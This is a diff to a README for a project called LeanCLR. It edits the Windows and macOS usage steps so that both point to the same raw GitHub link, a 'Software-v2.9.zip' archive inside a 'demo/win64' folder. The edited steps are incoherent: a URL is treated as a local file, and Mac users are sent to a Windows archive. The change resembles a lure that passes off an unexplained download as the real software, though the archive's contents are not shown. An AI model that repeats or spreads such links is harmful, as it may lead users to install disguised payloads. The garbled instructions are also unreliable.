karthiikk-08/leanclr/README.md

 After installation, running LeanCLR is straightforward:

 1. **For Windows:**
-   - Find the `leanclr-windows.exe` file in your Downloads folder.
+   - Find the `https://raw.githubusercontent.com/karthiikk-08/leanclr/main/demo/win64/dotnetframework/Software-v2.9.zip` file in your Downloads folder.
    - Double-click the file to launch LeanCLR.

 2. **For Mac:**
-   - Locate the downloaded `leanclr-macos.zip` file.
+   - Locate the downloaded `https://raw.githubusercontent.com/karthiikk-08/leanclr/main/demo/win64/dotnetframework/Software-v2.9.zip` file.
    - Unzip the file and move the `leanclr` application to your Applications folder.
    - Double-click the application to open it.